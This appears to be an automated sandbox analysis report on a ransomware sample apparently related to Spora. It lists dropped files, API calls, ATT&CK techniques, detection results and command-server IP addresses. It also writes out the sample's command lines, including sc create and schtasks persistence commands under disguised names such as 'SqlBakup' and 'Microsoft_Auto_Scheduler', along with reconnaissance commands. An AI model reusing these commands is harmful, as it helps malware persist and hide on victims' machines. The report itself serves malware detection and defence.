      Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW'
      Source: C:\Windows\SysWOW64\tasklist.exe | Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A64F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A64F58
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A500BB LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A500BB
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A60E79 mov eax, dword ptr fs:[00000030h] 0_2_00A60E79
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00650E79 mov eax, dword ptr fs:[00000030h] 42_2_00650E79
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A402E0 TlsGetValue,TlsSetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00A402E0
      Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A64F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A64F58
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A4176D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A4176D
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A41968 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A41968
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A41ACA SetUnhandledExceptionFilter,0_2_00A41ACA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00654F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00654F58
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0063176D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_0063176D
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00631968 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00631968
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /i "os name"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /i "original"
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009D3DD0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,0_2_009D3DD0
      Source: Xinfecter.exe, 0000002A.00000002.2189177147.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr5.0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A41105 cpuid 0_2_00A41105
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: ___crtGetLocaleInfoEx,0_2_00A3C03B
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: GetLocaleInfoW,0_2_00A3C347
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00A7E50A
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: EnumSystemLocalesW,0_2_00A7E782
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: EnumSystemLocalesW,0_2_00A7E7CD
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00A7E8F5
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: EnumSystemLocalesW,0_2_00A7E868
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: GetLocaleInfoW,0_2_00A7EB45
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: EnumSystemLocalesW,0_2_00A72C30
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00A7EC6E
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: GetLocaleInfoW,0_2_00A7ED75
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00A7EE42
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: GetLocaleInfoW,0_2_00A7311A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: ___crtGetLocaleInfoEx,42_2_0062C03B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,42_2_0062C347
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,42_2_0066E50A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,42_2_0066E7CD
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,42_2_0066E782
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,42_2_0066E868
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,42_2_0066E8F5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,42_2_0066EB45
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,42_2_0066EC6E
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,42_2_00662C30
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,42_2_0066ED75
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,42_2_0066EE42
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,42_2_0066311A
      Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A73184 GetSystemTimeAsFileTime,0_2_00A73184
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C36F0 GetUserNameW,0_2_009C36F0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A7B462 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00A7B462
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A46793 GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_00A46793
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009B1960 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_009B1960
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A52073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00A52073
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A52D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00A52D69
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009B1020 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_009B1020
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009B12E0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_009B12E0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00642073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,42_2_00642073
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00642D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,42_2_00642D69
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (12) | Replication Through Removable Media (1) | Windows Management Instrumentation (231) | Scripting (12) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (1) | DLL Side-Loading (1) | Windows Service (11) | Obfuscated Files or Information (2) | LSASS Memory | Peripheral Device Discovery (11) | Remote Desktop Protocol | Data from Removable Media | Encrypted Channel (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Scheduled Task/Job (1) | Windows Service (11) | Process Injection (12) | DLL Side-Loading (1) | Security Account Manager | Account Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Standard Port (11) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Service Execution (1) | Scheduled Task/Job (1) | Scheduled Task/Job (1) | File Deletion (1) | NTDS | File and Directory Discovery (3) | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol (2) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Registry Run Keys / Startup Folder (12) | Registry Run Keys / Startup Folder (12) | Masquerading (11) | LSA Secrets | System Information Discovery (58) | SSH | Keylogging | Application Layer Protocol (2) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Virtualization/Sandbox Evasion (13) | Cached Domain Credentials | Network Share Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Process Injection (12) | DCSync | Security Software Discovery (241) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal (1) | Proc Filesystem | Virtualization/Sandbox Evasion (13) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | Process Discovery (3) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | System Owner/User Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | System Network Configuration Discovery (1) | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior Graph ID: 1569986 | Sample: xKvkNk9SXR.exe | Start date: 06/12/2024 | Architecture: WINDOWS | Score: 100

Start:
• DNS/IP: api.ipify.org
• Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 10 other signatures
• Started: xKvkNk9SXR.exe; cmd.exe; Xinfecter.exe

xKvkNk9SXR.exe:
• DNS/IP: 185.147.34.53, 3586, 49705 (HOSTSLIM-GLOBAL-NETWORKNL, Iceland); api.ipify.org 104.26.12.205, 49704, 80 (CLOUDFLARENETUS, United States)
• Dropped: C:\Users\user\AppData\...\Xinfecter.exe (PE32); C:\Windows\SysMain.sys (ASCII); C:\Users\user\AppData\S-8459.vbs (ASCII); 4 other malicious files
• Signatures: Deletes shadow drive data (may be related to ransomware); Drops PE files to the startup folder; Sample is not signed and drops a device driver; Contains functionality to clear event logs
• Started: cmd.exe (three instances); 9 other processes

cmd.exe (started from Start): started wscript.exe; conhost.exe
Xinfecter.exe: started conhost.exe

cmd.exe (first instance under xKvkNk9SXR.exe): started wscript.exe
cmd.exe (second instance): started systeminfo.exe; find.exe
cmd.exe (third instance):
• Signatures: Uses schtasks.exe or at.exe to add and modify task schedules
• Started: tasklist.exe; findstr.exe
9 other processes: started WmiPrvSE.exe; 6 other processes

wscript.exe (under the Start cmd.exe):
• Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
• Started: cmd.exe; cmd.exe
wscript.exe (under the first cmd.exe):
• Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
• Started: cmd.exe; cmd.exe
systeminfo.exe:
• Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI

cmd.exe (under the first wscript.exe): started conhost.exe; tasklist.exe; find.exe
cmd.exe (under the first wscript.exe): started conhost.exe
cmd.exe (under the second wscript.exe): started tasklist.exe; conhost.exe; find.exe; 18 other processes
cmd.exe (under the second wscript.exe): started conhost.exe

Source | Detection | Scanner | Label | Link
xKvkNk9SXR.exe | 82% | ReversingLabs | Win32.Ransomware.Spora
xKvkNk9SXR.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | 82% | ReversingLabs | Win32.Ransomware.Spora
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://api.ipify.org/ | xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F97000.00000004.00000020.00020000.00000000.sdmp; xKvkNk9SXR.exe, 00000000.00000002.3296757158.0000000000988000.00000004.00000010.00020000.00000000.sdmp; xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp; xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://api.ipify.org/C#O | xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.kraken.com/learn/buy-bitcoin-btc | xKvkNk9SXR.exe, Xinfecter.exe.0.dr | false | | high
http://api.ipify.org/Y/O | xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.coinbase.com/how-to-buy/bitcoin | xKvkNk9SXR.exe, Xinfecter.exe.0.dr | false | | high
http://api.ipify.org | xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp; xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
185.147.34.53 | unknown | Iceland | 207083 | HOSTSLIM-GLOBAL-NETWORKNL | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1569986
                    Start date and time:2024-12-06 13:50:23 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 51s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:63
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:xKvkNk9SXR.exe
                    renamed because original name is a hash value
                    Original Sample Name:2619065d71a290ad0369cb3c19f1d5a58c43bf7abb52fb8828727483d32bdcf7.exe
                    Detection:MAL
                    Classification:mal100.rans.troj.adwa.evad.winEXE@116/22@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 49
                    • Number of non-executed functions: 229
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: xKvkNk9SXR.exe
Time | Type | Description
13:51:20 | Task Scheduler | Run new task: Microsoft_Auto_Scheduler path: "C:\Users\user\AppData\S-2153.bat"
13:51:20 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.12.205 | GD8c7ARn8q.exe | malicious | TrojanRansom | api.ipify.org/
104.26.12.205 | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom | api.ipify.org/
104.26.12.205 | Simple2.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | Ransomware Mallox.exe | malicious | Targeted Ransomware | api.ipify.org/
104.26.12.205 | Yc9hcFC1ux.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | 6706e721f2c06.exe | malicious | Remcos | api.ipify.org/
104.26.12.205 | perfcc.elf | malicious | Xmrig | api.ipify.org/
104.26.12.205 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | hloRQZmlfg.exe | malicious | RDPWrap Tool | api.ipify.org/
185.147.34.53 | BiXS3FRoLe.exe | malicious | TrojanRansom |
185.147.34.53 | lEUy79aLAW.exe | malicious | TrojanRansom |
185.147.34.53 | GD8c7ARn8q.exe | malicious | TrojanRansom |
185.147.34.53 | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom |
185.147.34.53 | Help.File@zohomail.eu_Fast.exe | malicious | TrojanRansom |
185.147.34.53 | Xinfecter.exe | malicious | TrojanRansom |
185.147.34.53 | Ross.dec1966@gmail.com_Fast.bin.exe | malicious | Babuk, Chaos, Conti, RegretLocker, TrojanRansom |
185.147.34.53 | 12.exe1 | malicious | BTC, Conti, Neshta, RegretLocker, TrojanRansom |
185.147.34.53 | DttL6H1DqQ.exe | malicious | Babuk, Chaos, Conti |
185.147.34.53 | PAvH6odjUO.exe | malicious | Voidcrypt |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | BiXS3FRoLe.exe | malicious | TrojanRansom | 104.26.13.205
api.ipify.org | lEUy79aLAW.exe | malicious | TrojanRansom | 104.26.13.205
api.ipify.org | GD8c7ARn8q.exe | malicious | TrojanRansom | 104.26.12.205
api.ipify.org | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom | 104.26.12.205
api.ipify.org | Simple1.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | Simple1.exe | malicious | Unknown | 104.26.13.205
api.ipify.org | Simple2.exe | malicious | Unknown | 104.26.12.205
api.ipify.org | Simple2.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | systemConfigChecker.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | systemConfigChecker.exe | malicious | Unknown | 172.67.74.152
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTSLIM-GLOBAL-NETWORKNL | BiXS3FRoLe.exe | malicious | TrojanRansom | 185.147.34.53
HOSTSLIM-GLOBAL-NETWORKNL | lEUy79aLAW.exe | malicious | TrojanRansom | 185.147.34.53
HOSTSLIM-GLOBAL-NETWORKNL | GD8c7ARn8q.exe | malicious | TrojanRansom | 185.147.34.53
HOSTSLIM-GLOBAL-NETWORKNL | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom | 185.147.34.53
HOSTSLIM-GLOBAL-NETWORKNL | la.bot.sparc.elf | malicious | Unknown | 213.166.86.57
